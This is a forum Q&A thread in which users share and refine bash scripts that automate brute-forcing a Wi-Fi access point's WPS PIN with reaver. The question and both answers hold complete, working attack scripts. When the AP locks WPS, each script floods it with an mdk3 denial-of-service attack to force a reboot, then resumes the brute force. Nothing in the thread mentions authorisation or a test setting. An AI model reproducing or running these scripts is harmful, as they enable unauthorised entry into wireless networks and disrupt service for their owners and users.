
First of all, sorry for my poor English. I'm trying to write a bash script to perform AP WPS cracking using reaver. The problem is that after trying some WPS PINs, the AP locks WPS, so reaver is no longer useful.

To solve this, I perform an mdk3 attack to force the AP to reboot and be able to attack it again (after the reboot, WPS restarts in an unlocked state).

The problems with this approach are that:

  1. I have to be in front of the PC looking for when the AP gets locked, and
  2. then start an mdk3 attack, stop it when the AP has rebooted, and run the reaver attack again.

The solution to this is obviously a script.

I wrote the following lines which should solve this.

I have to say that I'm a total noob in bash scripting, so the script is not "professional"; it's just a "workaround" to solve my problem.

#!/bin/bash

while true; do
    # Switch to the correct channel and save it into $channel
    echo Detecting AP channel
    timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
    rm ap_channel 2> /dev/null
    touch ap_channel
    timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
    channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
    rm ap_channel

    # Attacks the AP while it isn't wps-locked
    rm ap_status 2> /dev/null
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -z "$(grep Locked ap_status)" ]; do
        echo Performing reaver attack
        aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
        timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked
    ((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
    mdk3_pid=$!
    rm ap_status
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -n "$(grep Locked ap_status)" ]; do
        echo Trying to reboot the AP
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
    kill -9 $mdk3_pid
    echo AP rebooted. Waiting 2 mins till AP init
    sleep 120
done

The problem in this script is that the stdout redirection that I use for the airodump output behaves differently when I run it directly on the command line than when I run it inside the script.

timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status

I need a way to execute the line above within the script as if I had executed it directly in the tty. I can't do this using exec because I need to continue with the script.

NOTE: I can't use the -w option for airodump-ng because it doesn't save the WPS status.

Could someone please help me with this?

Rakibul Haq

2 Answers

I finally got it. I found a workaround to solve this problem: redirecting the stdout of the commands to files. I'm posting the script; maybe someone can use it.

#!/bin/bash

while true; do

rm attack
rm ap_status
rm ap_channel

# Detects the AP channel
echo Detecting AP channel
timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel
timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
rm ap_channel
echo Detected AP channel $channel

# Attacks the AP using reaver till the AP locks the WPS
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid

while [ -z "$(grep Locked ap_status)" ]; do
    echo Performing reaver attack
    aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
    timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
done

# Force a reboot in the AP to unlock WPS
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > attack &
mdk3_pid=$!

((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid

while [ -n "$(grep Locked ap_status -m 1)" ]; do
    echo Trying to reboot the AP
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
done

# The AP is now rebooted. Kill the mdk3 process and wait 5 mins before restarting the reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 5 mins till AP init
rm attack
rm ap_status
sleep 300

done

The delays are set long, but they are OK. They depend on the AP; you can change them.

To use the script, the aircrack, reaver (latest version, the one which has the --wps option), timeout and mdk3 packages are needed.

If someone who knows about bash scripting wants to modify the script and upload a better one, that would be great!

Community

My variant. The fixed delays are replaced with dynamic waits. It counts the PIN tries and the wait time.

Replace "-C gnome-screenshot -f" with your screenshot program or remove it.

#!/bin/bash

while true; do

rm attack 2> null
rm ap_status 2> null
rm ap_channel 2> null
rm assoc 2> null

AP_SSID="TARGET_ESSID"
AP_BSSID="TARGET_BSSID"
MY_MAC="YOU_MAC"
MON_INTERFACE=wlan0mon
PREV_SESS_FILE="PREV_SESSION_FILE.wpc"
countTryPin=0
countFile=totalTryPinCount # count file to store total try pin
waitTryReboot=0 # count wait time AP rebooting (DDOS MDK3)
waitReboot=0 # count wait time AP recovery after rebooting
touch $countFile

echo -e -n "\n\nDetect channel"

touch assoc
((reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID -A -s $PREV_SESS_FILE) 2>&1) > assoc &
assoc_pid=$!

while [ -z "$(grep Associated assoc)" ]; do
    sleep 3
    echo -n .
done

echo -e "\n\n"
kill -9 $assoc_pid
wait $assoc_pid 2> null
rm assoc

echo -n "Wait association"
((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
ap_channel_pid=$!
while [ -z "$(grep successful ap_channel)" ]; do
    sleep 1
    echo -n "."
done

channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
echo -e "\nChannel set to $channel\n\n"
rm ap_channel

touch ap_status
echo -n -e "\nCheck AP WPS lock"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    echo -n .
    sleep 1
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done

echo -e "\n\n"
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!

while [ -z "$(grep $AP_SSID ap_status -m 1)" ]; do
    sleep 2
done

kill -9 $airodump_pid
wait $airodump_pid 2> null

while [ -z "$(grep Locked ap_status -m 1)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    echo -e "\n\nBegin reaver attack\n\n"
    echo -n "Wait association"
    ((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
    ap_channel_pid=$!
    while [ -z "$(grep successful ap_channel)" ]; do
        sleep 1
        echo -n "."
    done
    echo -e "\n\n"
    timeout 10 reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID --no-nacks -vv -s $PREV_SESS_FILE -w -A -g 1 -C gnome-screenshot -f # remove or replace "-C gnome-screenshot -f" with your screenshot program
    countTryPin=$((countTryPin + 1))
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done


# Force a reboot in the AP to unlock WPS
((mdk3 $MON_INTERFACE a -a $AP_BSSID) 2>&1) > attack &
mdk3_pid=$!

echo -e "\n\n"
while [ -n "$(grep Locked ap_status -m 1)" ] && [ -n "$(grep $AP_SSID ap_status -m 1)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 4
    waitTryReboot=$((waitTryReboot + 4))
    echo -e -n "\rTry calling reboot AP. Wait $waitTryReboot sec."
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done

# The AP is now rebooted. Kill the mdk3 process, then wait for the AP to come back before restarting the reaver attack
kill -9 $mdk3_pid
wait $mdk3_pid 2> null

totalTryPin=$(cat "$countFile")
totalTryPin=$((totalTryPin + countTryPin))
echo $totalTryPin > $countFile

echo -e "\n\n"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
    # After reboot AP may be change channel. Run without channel
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 5
    waitReboot=$((waitReboot + 5))
    echo -e -n "\rAP rebooting. Wait $waitReboot sec."
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done

rm attack
rm ap_status 
rm null
execTime=$(($SECONDS+$waitTryReboot+$waitReboot))
echo -e "\n\nDone $countTryPin try pin.\
\nCalling reboot AP wait time $waitTryReboot sec.\
\nAP rebooting wait time $waitReboot sec.\
\nTotal execute time $SECONDS sec.\
\nTotal try pin $totalTryPin\n\n"
sleep 3
SECONDS=0
done